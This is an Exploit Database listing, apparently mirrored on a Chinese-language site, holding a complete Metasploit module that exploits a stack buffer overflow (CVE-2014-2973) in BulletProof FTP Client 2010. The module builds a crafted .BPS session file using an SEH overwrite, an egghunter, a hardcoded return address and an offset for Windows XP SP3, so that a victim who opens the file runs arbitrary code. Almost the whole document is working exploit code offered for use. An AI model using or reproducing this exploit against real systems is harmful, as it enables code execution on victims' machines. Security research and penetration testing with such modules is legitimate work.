BulletProof FTP Client – BPS Buffer Overflow (Metasploit)

• Exploit Database
• 19 阅读

• 作者： Metasploit
  日期： 2015-01-06
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35712/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'BulletProof FTP Client BPS Buffer Overflow',
  'Description'=> %q{
  This module exploits a stack-based buffer overflow vulnerability in
  BulletProof FTP Client 2010, caused by an overly long hostname.
  By persuading the victim to open a specially-crafted .BPS file, a
  remote attacker could execute arbitrary code on the system or cause
  the application to crash. This module has been tested successfully on
  Windows XP SP3.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Gabor Seljan'
  ],
  'References' =>
  [
  [ 'EDB', '34162' ],
  [ 'EDB', '34540' ],
  [ 'EDB', '35449' ],
  [ 'OSVDB', '109547' ],
  [ 'CVE', '2014-2973' ],
  ],
  'DefaultOptions' =>
  {
  'ExitFunction' => 'process'
  },
  'Platform' => 'win',
  'Payload'=>
  {
  'BadChars' => "\x00\x0a\x0d\x1a",
  'Space'=> 2000
  },
  'Targets'=>
  [
  [ 'Windows XP SP3',
  {
  'Offset' => 89,
  'Ret'=> 0x74c86a98# POP EDI # POP ESI # RET [oleacc.dll]
  }
  ]
  ],
  'Privileged' => false,
  'DisclosureDate' => 'Jul 24 2014',
  'DefaultTarget'=> 0
  ))
  
  register_options(
  [
  OptString.new('FILENAME', [ false, 'The file name.', 'msf.bps'])
  ],
  self.class)
  end
  
  def exploit
  eggoptions = {
  :checksum => true,
  :eggtag => 'w00t'
  }
  
  hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
  
  sploit = "This is a BulletProof FTP Client Session-File and should not be modified directly.\r\n"
  sploit << rand_text_alpha(target['Offset'])
  sploit << generate_seh_record(target.ret)
  sploit << hunter + "\r\n"# FTP Server HOST / IP
  sploit << rand_text_numeric(5) + "\r\n"# Port number
  sploit << egg+ "\r\n"# Login name
  sploit << rand_text_alpha(8) + "\r\n"# Login password
  
  # Create the file
  print_status("Creating '#{datastore['FILENAME']}' file...")
  file_create(sploit)
  end
  
  end